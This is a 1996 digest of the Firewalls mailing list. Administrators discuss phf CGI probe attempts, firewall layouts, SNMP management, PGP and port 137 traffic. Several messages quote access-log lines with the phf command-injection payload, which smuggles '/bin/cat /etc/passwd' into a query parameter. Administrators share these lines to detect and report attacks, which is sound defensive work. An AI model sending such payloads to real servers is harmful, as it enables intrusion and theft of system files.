Dirty dogs To: firewalls@count04.mry.scruznet.com Date: Mon, 15 Jul 96 9:00:46 EDT Cc: firewalls@greatcircle.com In-Reply-To: <199607141756.KAA04146@count04.mry.scruznet.com>; from "firewalls@count04.mry.scruznet.com" at Jul 14, 96 10:56 am Mailer: Elm [revision: 70.85.2.1] Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Subject: Dirty dogs >To: firewalls@GreatCircle.COM >Sender: firewalls-owner@GreatCircle.COM >Precedence: bulk > > >I was browsing through the system files of a web server that sits outside a >firewall There were a couple of interesting entries in the access log > >960412access:198.69.26.81 - - [12/Apr/1996:04;24;42 -0400] >"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207 > >960222access:152.163.192.15 - - [21/Jun/1996:12:19:22 -0400] >"GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 207 > >This didnt work for two reasons One there is no phf program in the system >Two the cgi application gateway is running chrooted > >I am not really very good at understanding this hacking and cracking stuff >What else could they have tried that might have worked > > # whois 152.163 Hi, I have a program (gethostbyaddr) that does reverse lookups without all the nslookup set(options) and I used it to find the address above, here's what I got and the name of the offending system. #getaddr 152.163.192.15 Host IP address is: Most likely you know it, right..... The hostname it is known as is: www-b2.proxy.aol.com By the www-b2, I tried to connect to www-b2.proxy.aol.com and the server is apparently down at this time, or just refused my http connection. I tried to telnet to it, as well as ping and it doesn't answer, so I would guess it's down. I would think that what may have happened, is that somehow someone got to the proxy server (www-b2.proxy.aol.com) and tried to use it as a base and link to other web sites, thus they connected to the original poster's server and started playing. If the IP addresses by AOL are dynamic allocated, then the time this server was connected to should be traceable the the originating dial in account. It would take some doing on AOL's account, but is possible. I would also guess that since the name is www-b2.proxy.aol.com that this maybe some sort of firewall, and if so, there should be logs available to track the user(s) activity. It would require some effort from AOL, and I am not sure of their resources or capabilities in this area. I would also guess that since AOL sends out all those little floppies with temporary access for a "free trial" that potential "hackers" have a virtual unlimited access to the net for a "trial" basis. They could keep this up for quite some time (unlimited), and this is UNTRACEABLE. take care stevep. spayne@dsdc.dla.mil From firewalls-owner Mon Jul 15 07:34:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA26079 for firewalls-outgoing; Mon, 15 Jul 1996 07:21:47 -0700 (PDT) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA26054 for ; Mon, 15 Jul 1996 07:21:33 -0700 (PDT) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) Date: Mon, 15 Jul 1996 10:18:15 -0400 (EDT) Message-Id: <199607151418.KAA09587@SPARKY.CF.CS.YALE.EDU> To: firewalls@GreatCircle.com, pchyland@tasc.com Subject: Re: What Parameters are Critical to Firewall Mgt? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk pchyland@tasc.com wrote: > My overall research goal is to use SNMP to instrument >security applications (such as an IDS, firewalls or S-HTTP) in order >to provide more effective configuration, status and control. My >belief is that a common security management framework that interacts >with several different application may be a more efficient and >effective tool than several standalone tools. I would have real concerns about using SNMP (especially SNMPv1 and SNMPv2 w/o encryption and authentication) to control (configurure and manage -- I'd have much less of a problem with monitoring) firewalls. Even if you restrict all management stations and requests to the secure internal net. - Morrow From firewalls-owner Mon Jul 15 07:49:19 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA26406 for firewalls-outgoing; Mon, 15 Jul 1996 07:33:34 -0700 (PDT) Received: from magellan.knight-ridder.com (magellan.knight-ridder.com [206.28.156.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA26395 for ; Mon, 15 Jul 1996 07:33:27 -0700 (PDT) Received: by magellan.knight-ridder.com; id HAA12323; Mon, 15 Jul 1996 07:29:00 -0400 Received: from unknown(166.108.250.155) by magellan.knight-ridder.com via smap (g3.0.3) Received: by exchange1.herald.com with Microsoft Exchange (IMC 4.0.838.14) Message-ID: From: Todd Williams To: "'firewalls@greatcircle.com'" Subject: RE: Extending Financial Applications And Protecting via a Firewall Date: Mon, 15 Jul 1996 10:29:38 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.838.14 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Syer A. Caudilll wrote: > Our organization would like to extend a human resources application to > the internet. Our goal is to allow end users to post payroll hours over > the internet. The nature of the application requires allowing access to > a production Oracle database. The only service to be provided is http. > The database is production, must be updated by the end=user via the > internet. What firewall strategies should be pursued for this type of > endeaour? Any input would be appreciatted. There are lots of overall security issues here, but I'll just touch on some of the basics. First, if your end users are going to be transmitting any "sensitive" info such as their social security #'s, you might want to look at running secure transactions via Netscape or some other "secure" server, depending on your company's policy on these things. Second, the firewall issues can vary according to your implementation, but I'll tell one possible setup. You can run a 3 interface firewall - 1 outside, 1 inside, & 1 that houses your web servers, ftp servers, etc. Your Oracle db would sit somewhere on the inside network, not directly accessible from the outside. The web server would house your cgi program(s) to access the db, and the firewall would be configured to only allow traffic from that web machine through to the db. That way, your inside users can still have a clean access path to the db. Third, you need to make absolutely sure that the userid that the cgi stuff will run as has the minimum necessary permissions to only the db tables it needs, and nothing more. Be especially aware of any "public" style db groups that all users fall into by default. For example, if the cgi userid is "www", the table is "payroll", and it only needs to add records, not update or delete, then you need to make sure that www has insert permission only for payroll and no other rights, either directly or via group membership. From firewalls-owner Mon Jul 15 08:20:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA27857 for firewalls-outgoing; Mon, 15 Jul 1996 08:06:43 -0700 (PDT) Received: from tera.bctel.net (tera.bctel.net [204.174.64.252]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA27850 for ; Mon, 15 Jul 1996 08:06:35 -0700 (PDT) Received: (from nobody@localhost) by tera.bctel.net (8.7.4/8.7.1) id HAA18804; Mon, 15 Jul 1996 07:56:28 -0700 (PDT) Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) Received: (from murrell@localhost) by mocha.bctel.net (8.7.5/8.7.3) id IAA24161; Mon, 15 Jul 1996 08:02:55 -0700 (PDT) From: Brian Murrell Message-Id: <199607151502.IAA24161@mocha.bctel.net> Date: Mon, 15 Jul 1996 08:02:54 -0700 (PDT) To: bhalla@wwonline.com Cc: firewalls@GreatCircle.COM Subject: Re: Encryption .. May be i am asking at the wrong place In-Reply-To: <199607130409.AAA12526@kimberlite.wwonline.com> X-Mailer: Ishmail 1.2.2-960610-sol24 MIME-Version: 1.0 Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm probably going to get stomped for something or another in this, however nothing ventured... from the quill of N Bhalla on scroll <199607130409.AAA12526@kimberlite.wwonline.com> > I was wondering I have read and heard a lot about pgp being the best > package > for data encyption which i do believe as well.. The best package for out of stream encryption, probably. > But why are people still using other data encryption pacakages .. > Why can't the unix password etc be also encrypted in PGP Because PGP is not really suited to that task. You need to separate PGP and RSA public key technology as concepts. The latter is a general method of obtaining keys for parties to which you need to communicate securley, but have not done so in the past (i.e. you have no channel over which you can exchange keys). The former uses the latter to encrypt data for another party, and/or to digitally sign data for another party. > Why can't the cellular phones whose numbers are being tracked down by > scanners not be encrypted in pgp .. Several reasons. PGP describes a method for two unintroduced parties to encrypt and exchnage information. It is an RSA key exchange as well as session key selection and encryption. The Cellular phone thing could probably start with RSA and move on from there, not really having anything to do with PGP. RSA is patented in the US and thusly would increase the cost of a cell phone in a market that probably could not bear it. There is already a digital cellular phone (defacto??) standard which boasts security. I know very little about cellular phones however. > Why can't we have pgp for firewalls .. etc .. Again, because PGP encryption is meant to be done out of stream. There are RSA based key exchage systems for stream encryption standards emerging, however they are not PGP per se. b. -- Brian J. Murrell Brian_Murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5279 From firewalls-owner Mon Jul 15 09:41:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA05090 for firewalls-outgoing; Mon, 15 Jul 1996 09:26:13 -0700 (PDT) Received: from netsurfer.sersol.com (netsurfer.pixi.com [204.188.76.194]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA05083 for ; Mon, 15 Jul 1996 09:26:07 -0700 (PDT) Received: from netsurfer (www) by netsurfer.sersol.com ; 15 JUL 96 06:22:55 Date: Mon, 15 Jul 1996 06:22:55 -1000 (HST) From: NetSurfer X-Sender: netsurf@netsurfer To: Dave Roberts Cc: Firewalls@GreatCircle.COM Subject: Re: Dirty Dogs on AOL In-Reply-To: Message-ID: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 15 Jul 1996, Dave Roberts wrote: > I continously asked for help in identifying the problem (the list admin > was away at the time), and never received anything. Eventually the spams > stopped, but the person simply moved lists. My experience with this is that AOL does not acknowledge the complaints but does act on them. In every case the postings stopped after the notification was sent. And I've seen complaints by ex-AOL users about being dropped for spamming. #include _ __ __ _____ ____ / | / /__ / /_/ ___/__ _______/ __/__ _____ / |/ / _ \/ __/\__ \/ / / / ___/ /_/ _ \/ ___/ / /| / __/ /_ ___/ / /_/ / / / __/ __/ / ================/_/=|_/\___/\__//____/\__,_/_/==/_/==\___/_/=============== From firewalls-owner Mon Jul 15 12:48:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA17917 for firewalls-outgoing; Mon, 15 Jul 1996 12:32:40 -0700 (PDT) Received: from insite.virtual-x.com ([208.193.158.55]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA17910 for ; Mon, 15 Jul 1996 12:32:33 -0700 (PDT) Received: from insite.virtual-x.com (208.193.158.44) by insite.virtual-x.com Message-ID: <31EA9CD8.37EE@dornsife.com> Date: Mon, 15 Jul 1996 12:33:09 -0700 From: Harold Alston Reply-To: harold@dornsife.com Organization: Dornsife & Associates, Inc. X-Mailer: Mozilla 3.0b4Gold (Macintosh; I; PPC) MIME-Version: 1.0 To: James Proffer CC: firewalls@greatcircle.com Subject: Re: Dirty dogs References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk two attacks same kind on 7/14/96, both from same host. What action has anyone taken on these? James Proffer wrote: > > > We got a lot of these too: > > > > access_log:206.12.81.100 - - [07/Jul/1996:21:48:58 -0400] "GET > > /cgi-bin/phf?Qname=tests%0acat%20/etc/passwd HTTP/1.0" 404 - > > > > Not original but they tried--looks like an automated script judging from > > the similarities of the log entries. > > > > In any case does anyone else have any experiences with this? I know the > > problem and all, I'm just trying to get an idea of how widespread this is. > > Our one and only attmpt was on July 4 of this year. > > slip51.genstar.net - - [04/Jul/1996:00:37:24 -0500] "GET > /cgi-bin/phf?Qalias=x%0 a/bin/cat%20/etc/passwd HTTP/1.0" 403 0 > > Missouri State Data Center <*> James Proffer: UNIX sysadm > Missouri Government Information | mailto:james@mail.state.mo.us > for the citizens of Missouri | http://www.state.mo.us/server.html > and the citizens of the world | (573) 751-1544 Fax: (573) 751-3299 -- ___________________________ Harold Alston harold@dornsife.com Network Systems Administrator Dornsife & Associates, Inc. Internet Commerce Strategies (p) 619-673-1855 (f) 619-673-1854 I do not fear computer. I fear the lack of them. - Isaac Asimov From firewalls-owner Mon Jul 15 13:51:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA22104 for firewalls-outgoing; Mon, 15 Jul 1996 13:25:43 -0700 (PDT) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA22097 for ; Mon, 15 Jul 1996 13:25:37 -0700 (PDT) Received: by hidata.com; id AA29166; Mon, 15 Jul 96 13:22:32 PDT Received: from osc.hidata.com(205.158.62.10) by hds-gw.hidata.com via smap (V3.1.1) Received: from enterprise by osc.osc.hidata.com (SMI-8.6/SMI-SVR4) Date: Mon, 15 Jul 1996 13:22:25 -0700 Message-Id: <199607152022.NAA14781@osc.osc.hidata.com> X-Sender: bstout@osc.hidata.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: Bill Stout Subject: Re: Ports 137 & 138 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I too am curious about port 137. My site has no inbound services, only outbound. Do some NT websites use port 137 to resolve names? My proxy logs indicates that some hits on port 137 are in groups of 3, some from websites. My perusal of denied 137 hits: _Node_ _# of hits (port 137)_ chopin.inoc.dl.nec.com 173 205.163.132.3 159 www2.cardinal.com 155 www.process.com 92 194.88.4.49 90 icent.samara.emnet.ru 90 grizzly.umt.edu 72 pub.Imagazine.co.jp 50 ep-server05.apertus.com 48 204.176.208.103 45 198.64.207.4 39 MFGINFO.COM 39 www1.marvin.projectx.com 23 157.61.218.29 20 tide19.microsoft.com 18 207.6.29.231 17 207.6.29.233 17 204.87.235.3 11 www2.cardinal.com 9 157.61.218.23 6 204.126.174.71 6 abash1.microsoft.com 6 www3.hsonline.net 5 157.61.218.31 4 www.vit.com 4 www.microsys.com 3 mail.newworld.com 3 mailgate.virtek.com 3 smg.seagatesoftware.com 3 www.luckman.com 3 198.83.40.75 1 206.139.140.100 1 aristotle.qi3.com 1 ingate.idcresearch.com 1 mailgate.loud-n-bow.com 1 mjablecki.extern.ucsd.edu 1 nac-178.neural.com 1 nac-71.neural.com 1 ws1.gateway2000.com 1 www1.marvin.projectx.com 1 Bill Stout <=======10========20========30========40========50========60========70========80 William B. Stout | Major revelations: Senior Systems Admin | "All objects are part of a larger object." Hitachi Data Systems | "3 aware beings comprise a person; mind, body, spirit." NT/UNIX/I-net/Routers | "The secret of life: To be involved with 'creation'." 408-970-4822 | Infowar, Cyber-war, yes, 'they' are out to get you... -------------------------------------------------------------------------------- From firewalls-owner Mon Jul 15 14:49:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA28223 for firewalls-outgoing; Mon, 15 Jul 1996 14:44:00 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA28172 for ; Mon, 15 Jul 1996 14:43:45 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607152140.AA16179@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: Harold Alston Cc: James Proffer , firewalls From: Ryan.Russell/SYBASE Date: 15 Jul 96 14:40:45 EDT Subject: Re: Dirty dogs X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have yet to see a CERT advisory on these... Don't they usually warn about attacks that are being actively pursued? Ryan ---------- Previous Message ---------- To: james cc: firewalls From: harold @ dornsife.com (Harold Alston) @ smtp Date: 07/15/96 12:33:09 PM Subject: Re: Dirty dogs two attacks same kind on 7/14/96, both from same host. What action has anyone taken on these? James Proffer wrote: > > > We got a lot of these too: > > > > access_log:206.12.81.100 - - [07/Jul/1996:21:48:58 -0400] "GET > > /cgi-bin/phf?Qname=tests%0acat%20/etc/passwd HTTP/1.0" 404 - > > > > Not original but they tried--looks like an automated script judging from > > the similarities of the log entries. > > > > In any case does anyone else have any experiences with this? I know the > > problem and all, I'm just trying to get an idea of how widespread this is. > > Our one and only attmpt was on July 4 of this year. > > slip51.genstar.net - - [04/Jul/1996:00:37:24 -0500] "GET > /cgi-bin/phf?Qalias=x%0 a/bin/cat%20/etc/passwd HTTP/1.0" 403 0 > > Missouri State Data Center <*> James Proffer: UNIX sysadm > Missouri Government Information | mailto:james@mail.state.mo.us > for the citizens of Missouri | http://www.state.mo.us/server.html > and the citizens of the world | (573) 751-1544 Fax: (573) 751-3299 -- ___________________________ Harold Alston harold@dornsife.com Network Systems Administrator Dornsife & Associates, Inc. Internet Commerce Strategies (p) 619-673-1855 (f) 619-673-1854 I do not fear computer. I fear the lack of them. - Isaac Asimov From firewalls-owner Mon Jul 15 15:21:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA00868 for firewalls-outgoing; Mon, 15 Jul 1996 15:11:59 -0700 (PDT) Received: from gatekeeper.3Com.COM (gatekeeper.3Com.COM [129.213.128.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA00861 for ; Mon, 15 Jul 1996 15:11:52 -0700 (PDT) Received: from manzanita.DEV.3Com.COM.noname (manzanita.DEV.3Com.COM) by gatekeeper.3Com.COM with SMTP id AA11233 Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) Date: Mon, 15 Jul 96 15:07:19 PDT From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9607152207.AA01181@manzanita.DEV.3Com.COM.noname> To: mdr@vodka.sse.att.com, bobk@manzanita.DEV.3Com.COM Subject: RE: Web Server on DMZ Cc: Firewalls@GreatCircle.COM, ggh14854@ussun2f.glaxo.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What I'm suggesting is that the outer firewall be a 3 port unit. /Internet/---/Outer Firewall/--/DMZ with Servers/---/Corp Firewall/---/Corp Net/ | | (Inactive to Corp Net) The Corp Net connection on the far right of the top line can be swung to the outer firewall (assuming that you have port specific filtering capability) so that one firewall or the other is in place. Alternately, you can run the Outer Firewall running essentially the same filters that the inner one runs and have two different types of firewalls in place simultaneously. The downside is that you have to look at two different sets of logs. BobK From firewalls-owner Mon Jul 15 15:33:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA02181 for firewalls-outgoing; Mon, 15 Jul 1996 15:27:35 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA02067 for ; Mon, 15 Jul 1996 15:27:07 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607152223.AA17949@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: James Proffer Cc: firewalls From: Ryan.Russell/SYBASE Date: 15 Jul 96 15:24:47 EDT Subject: Re: Dirty dogs X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Indeed. Thanks for the info. Ryan ---------- Previous Message ---------- To: Ryan.Russell cc: harold, firewalls From: james @ mail.state.mo.us (James Proffer) @ smtp Date: 07/15/96 05:10:22 PM Subject: Re: Dirty dogs CERT announced this vulnerability in CA-96.06 (ftp://info.cert.org/pub/cert_advisories/CA-96.06.cgi_example_code) On 15 Jul 1996, Ryan Russell/SYBASE wrote: > I have yet to see a CERT advisory on these... > > Don't they usually warn about attacks that are > being actively pursued? > > Ryan > > ---------- Previous Message ---------- > To: james > cc: firewalls > From: harold @ dornsife.com (Harold Alston) @ smtp > Date: 07/15/96 12:33:09 PM > Subject: Re: Dirty dogs > > two attacks same kind on 7/14/96, both from same host. What action has > anyone taken on these? > > James Proffer wrote: > > > > > We got a lot of these too: > > > > > > access_log:206.12.81.100 - - [07/Jul/1996:21:48:58 -0400] "GET > > > /cgi-bin/phf?Qname=tests%0acat%20/etc/passwd HTTP/1.0" 404 - > > > > > > Not original but they tried--looks like an automated script judging from > > > the similarities of the log entries. > > > > > > In any case does anyone else have any experiences with this? I know the > > > problem and all, I'm just trying to get an idea of how widespread this is. > > > > Our one and only attmpt was on July 4 of this year. > > > > slip51.genstar.net - - [04/Jul/1996:00:37:24 -0500] "GET > > /cgi-bin/phf?Qalias=x%0 a/bin/cat%20/etc/passwd HTTP/1.0" 403 0 > > > > Missouri State Data Center <*> James Proffer: UNIX sysadm > > Missouri Government Information | mailto:james@mail.state.mo.us > > for the citizens of Missouri | http://www.state.mo.us/server.html > > and the citizens of the world | (573) 751-1544 Fax: (573) 751-3299 > > -- > ___________________________ > Harold Alston > harold@dornsife.com > Network Systems Administrator > Dornsife & Associates, Inc. > Internet Commerce Strategies > (p) 619-673-1855 > (f) 619-673-1854 > I do not fear computer. > I fear the lack of them. - Isaac Asimov > > > > > Missouri State Data Center <*> James Proffer: UNIX sysadm Missouri Government Information | mailto:james@mail.state.mo.us for the citizens of Missouri | http://www.state.mo.us/server.html and the citizens of the world | (573) 751-1544 Fax: (573) 751-3299 From firewalls-owner Mon Jul 15 16:08:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA04513 for firewalls-outgoing; Mon, 15 Jul 1996 15:47:46 -0700 (PDT) Received: from rbit.co.za (rbit.co.za [196.7.71.94]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id PAA04160 for ; Mon, 15 Jul 1996 15:44:54 -0700 (PDT) Received: (from johnb@localhost) by rbit.co.za (8.7.3/8.7.3) id AAA07356; Tue, 16 Jul 1996 00:41:29 +0200 From: John Betts Message-Id: <199607152241.AAA07356@rbit.co.za> Subject: Re: Ports 137 & 138 To: bill.stout@hidata.com (Bill Stout) Date: Tue, 16 Jul 1996 00:41:29 +0200 (SAT) Cc: firewalls@greatcircle.com In-Reply-To: <199607152022.NAA14781@osc.osc.hidata.com> from "Bill Stout" at Jul 15, 96 01:22:25 pm Reply-to: johnb@aztec.co.za Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk % Do some NT websites use port 137 to resolve names? My proxy % logs indicates that some hits on port 137 are in groups % of 3, some from websites. My perusal of denied 137 hits: % Well, my explanation is as follows: When I put a linux box down on a doze network running samba (the lanman file sharing program for unix..) the windoze boxes dont pick it up.... until they make some or other tcp connection to it, like using it as the e-mail/proxy host... My explanations are as follows: a) maybe those were windows boxes trying to connect to your web site, and then automatically tried to check any netbios traffic at the same time (as a windows "feature") so that ppl could look at your shares under file mangler? b) thought of the possibility of your web server which could be a nt one.. that was establishing the netbios-ns request (port 137) and those denieds where just from machines trying to reply to them? Any other ideas/suggestions? ciao -- John -- John Betts, Aztec Internet Services Port Elizabeth, South Africa johnb@aztec.co.za, Tel. +27(0)41 303 475, Fax. +27(0)41 301 052 Authorised Caldera Consultant || Part of the UUNet Group The world is complex. The Sendmail configuration reflects this. From firewalls-owner Mon Jul 15 16:58:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA09436 for firewalls-outgoing; Mon, 15 Jul 1996 16:36:23 -0700 (PDT) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-951221-1) id QAA09416 for firewalls@greatcircle.com; Mon, 15 Jul 1996 16:36:17 -0700 (PDT) Received: from phoenix.iss.net (phoenix.iss.net [204.241.60.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA19929 for ; Thu, 11 Jul 1996 07:58:27 -0700 (PDT) Received: from alexf.iss.net (alexf.iss.net [204.241.60.153]) by phoenix.iss.net (8.6.13/8.6.12) with SMTP id KAA24217 for ; Thu, 11 Jul 1996 10:55:26 -0400 Message-Id: <199607111455.KAA24217@phoenix.iss.net> Comments: Authenticated sender is From: "Alex F" Organization: Internet Security Systems, Inc. To: firewalls@GreatCircle.COM Date: Thu, 11 Jul 1996 10:57:05 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: NT Backoffice "Catapult" firewall certified? Reply-to: alexf@iss.net X-mailer: Pegasus Mail for Win32 (v2.32a) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > To subscribe to the NTSecurity list send mail to majordomo@iss.net > with the following in the body > > subscribe ntsecurity my@email.address > > (Where my@email.address is your email address). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Please pay attention to the above line and do not attempt to subscribe the address my@email.address Yes, several people did this by mistake :) (oops) > > Soon you'll be able to sign up over the web for the list (just gotta > get around to it). This is done (I actually had the time), and you can sign up for any of 3 lists that we run. Sorry for the noise. Alex F =-=-=-=-=-=-=-=-=-=-=-=-=- Alex F alexf@iss.net Marketing Specialist Internet Security Systems =-=-=-=-=-=-=-=-=-=-=-=-=- From firewalls-owner Tue Jul 16 05:06:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA09167 for firewalls-outgoing; Tue, 16 Jul 1996 04:54:35 -0700 (PDT) Received: from info.megasoft.com (info.megasoft.com [204.5.162.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id EAA09160 for ; Tue, 16 Jul 1996 04:54:27 -0700 (PDT) Received: by info.megasoft.com id HAA04699; Tue, 16 Jul 1996 07:49:37 -0400 (EDT) Received: from megasoft.com by info.megasoft.com via smap (info.megasoft.com) Received: by research.megasoft.com (SMI-8.6/SMI-SVR4) Date: Tue, 16 Jul 1996 07:43:41 -0400 Message-Id: <199607161143.HAA07348@research.megasoft.com> From: C Matthew Curtin To: jgeuin@ix.netcom.com (James L. Geuin) Cc: N Bhalla , jgeuin@netcom.com Subject: Re: Encryption .. May be i am asking at the wrong place In-Reply-To: <199607131450.HAA17334@dfw-ix12.ix.netcom.com> References: <199607131450.HAA17334@dfw-ix12.ix.netcom.com> Reply-To: cmcurtin@megasoft.com X-Attribution: Matt Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>>> "James" == James L Geuin writes: Someone else said... >> But why are people still using other data encryption pacakages .. >> Why can't the unix password etc be also encrypted in PGP Why can't >> the cellular phones whose numbers are being tracked down by >> scanners not be encrypted in pgp .. I get the impression that this person is confusing cryptographic applications and algorithms. PGP, as it exists today, is geared toward the encryption of email. Of course, the same protocols and algorithms could be written into silicon so that PGP-enabled devices would be all over the place, but I suspect the manufacturers of consumer electronics don't want to deal with the US government's certain requests (or even orders) to not do this-or-that with their products. PGPfone is an application by Zimmermann, et al, which basically turns your computer into a crypto phone, using PGP's protocols and algorithms. PGP uses freely available algorithms (RSA, IDEA and MD5) in current implementations and will continue to do so in future versions (although rumor is that it will include more choices of what you want to use for various parts: i.e., encrypt data with IDEA or 3DES? MD5 or SHA for signatures?) Other products *do* use these algorithms, but PGP is a trademarked name, and just because Joe Blow Crypto uses RSA and IDEA, he doesn't have an automatic right to call it PGP. And RSA is patented, so there are licensing issues with RSA... But this is way off of the firewalls topic. I suspect that cypherpunks is the place you want to ask (mail cypherpunks-request@toad.com for info.) James> I don't want to encrypt everything, just one or two James> applications. Have you heard of anything that I could use? It isn't clear *what* you want to encrypt. Apparantly not your entire data stream, just some parts of it .... Perhaps email? From what are you trying to protect yourself? Someone in your provider's cloud from snooping your PVC and picking up .... passwords? email? anything? Please direct follow-ups to me personally; this is beyond the scope of the firewalls list. -- C Matthew Curtin MEGASOFT, LLC Director, Security Architecture cmcurtin@research.megasoft.com http://www.research.megasoft.com/~cmcurtin/ Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet From firewalls-owner Tue Jul 16 05:24:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA10031 for firewalls-outgoing; Tue, 16 Jul 1996 05:14:19 -0700 (PDT) Received: from info.megasoft.com (info.megasoft.com [204.5.162.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA10024 for ; Tue, 16 Jul 1996 05:14:12 -0700 (PDT) Received: by info.megasoft.com id IAA04734; Tue, 16 Jul 1996 08:11:07 -0400 (EDT) Received: from megasoft.com by info.megasoft.com via smap (info.megasoft.com) Received: by research.megasoft.com (SMI-8.6/SMI-SVR4) Date: Tue, 16 Jul 1996 08:05:27 -0400 Message-Id: <199607161205.IAA07500@research.megasoft.com> From: C Matthew Curtin To: firewalls Subject: CERT Advisories (was: Re: Dirty dogs) In-Reply-To: <9607152140.AA16179@notesgw2.sybase.com> References: <9607152140.AA16179@notesgw2.sybase.com> Reply-To: cmcurtin@megasoft.com X-Attribution: Matt Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>>> "ryan" == SYBASE writes: ryan> I have yet to see a CERT advisory on these... Don't they ryan> usually warn about attacks that are being actively pursued? Yes, but only on attacks that are known to have a fix. Presumably, getting rid of /cgi-bin/phf would do the trick, hence, CERT would be able to send out an advisory. Has 8LGM sent one out? I haven't seen anything. Maybe it's time for a "firewalls advisory" :-) -- C Matthew Curtin MEGASOFT, LLC Director, Security Architecture cmcurtin@research.megasoft.com http://www.research.megasoft.com/~cmcurtin/ Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet From firewalls-owner Tue Jul 16 06:03:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA13680 for firewalls-outgoing; Tue, 16 Jul 1996 